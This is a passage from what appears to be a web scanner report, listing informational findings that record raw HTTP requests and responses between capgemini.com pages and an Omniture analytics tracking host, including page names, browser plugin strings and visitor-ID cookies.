s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:51:31 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:31 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:31 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:51:31 GMT
Last-Modified: Tue, 01 Mar 2011 17:51:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE0A3-6F7F-1BEE85DC"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www1
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.230. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92505897325463  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92505897325463

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92505897325463?AQB=1&ndh=1&t=28/1/2011%2011%3A56%3A12%201%20360&pageName=Our%20People&g=http%3A//www.capgemini.com/about/our_people/&r=http%3A//www.capgemini.com/about/&ch=About%20Us&c1=About%20Us&h1=Home%7CAbout%20Us%7COur%20People&v2=/about/our_people/&h2=Home%7CAbout%20Us%7COur%20People&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/about/our_people/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:56:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:09 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:09 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:56:09 GMT
Last-Modified: Tue, 01 Mar 2011 17:56:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE1B9-6AD8-42FD2E29"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www126
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.231. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92603963012807  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92603963012807

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92603963012807?AQB=1&ndh=1&t=28/1/2011%2011%3A53%3A53%201%20360&pageName=Register&g=http%3A//www.capgemini.com/registration/register/%3Fedit%3D1&r=http%3A//www.capgemini.com/my-capgemini/&h1=%7CRegister&v2=/registration/register/&h2=%7CRegister&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/registration/register/?edit=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:53:51 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:51 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:51 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:53:51 GMT
Last-Modified: Tue, 01 Mar 2011 17:53:51 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE12F-5403-2A94DFE6"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www1
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.232. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93442722123581  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93442722123581

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93442722123581?AQB=1&ndh=1&t=28/1/2011%2011%3A53%3A33%201%20360&pageName=Publications&g=http%3A//www.capgemini.com/insights-and-resources/by-publication/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/services-and-solutions/&pid=Publications&pidt=1&oid=http%3A//www.capgemini.com/services-and-solutions/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/insights-and-resources/by-publication/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:53:30 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:30 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:30 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:53:30 GMT
Last-Modified: Tue, 01 Mar 2011 17:53:30 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE11A-216B-5D272BC0"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www92
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.233. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93582125916145  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93582125916145

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93582125916145?AQB=1&ndh=1&t=28/1/2011%2011%3A53%3A28%201%20360&pageName=Investor%20Relation&g=http%3A//www.capgemini.com/investor/welcome/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/insights-and-resources/&pid=Investor%20Relation&pidt=1&oid=http%3A//www.capgemini.com/insights-and-resources/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/investor/welcome/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:53:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:25 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:25 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:53:25 GMT
Last-Modified: Tue, 01 Mar 2011 17:53:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE115-7AA8-3BABF74D"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www64
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.234. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93708241570275  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93708241570275

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93708241570275?AQB=1&ndh=1&t=28/1/2011%2011%3A53%3A22%201%20360&pageName=My%20Capgemini&g=http%3A//www.capgemini.com/my-capgemini/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/my-capgemini/my-page/&pid=My%20Capgemini&pidt=1&oid=http%3A//www.capgemini.com/my-capgemini/my-page/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/my-capgemini/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:53:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:20 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:53:20 GMT
Last-Modified: Tue, 01 Mar 2011 17:53:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE110-3BC2-3A89D1F7"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www132
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.235. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s94834942873567  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s94834942873567

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s94834942873567?AQB=1&ndh=1&t=28/1/2011%2011%3A53%3A43%201%20360&pageName=Technology%20Services&g=http%3A//www.capgemini.com/services-and-solutions/technology/&r=http%3A//www.capgemini.com/insights-and-resources/by-publication/&ch=Services%20%26%20Solutions&c1=Services%20%26%20Solutions&h1=Home%7CServices%20%26%20Solutions%7CTechnology%20Services&v2=/services-and-solutions/technology/&h2=Home%7CServices%20%26%20Solutions%7CTechnology%20Services&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/services-and-solutions/technology/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:53:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:40 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:40 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:53:40 GMT
Last-Modified: Tue, 01 Mar 2011 17:53:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE124-238D-2ABA5FE1"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www141
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.236. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s95697672062087  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s95697672062087

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s95697672062087?AQB=1&ndh=1&t=28/1/2011%2011%3A57%3A10%201%20360&pageName=Introduction%20to%20Capgemini&g=http%3A//www.capgemini.com/about/capgemini/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/experts/&pid=Introduction%20to%20Capgemini&pidt=1&oid=http%3A//www.capgemini.com/experts/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/about/capgemini/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
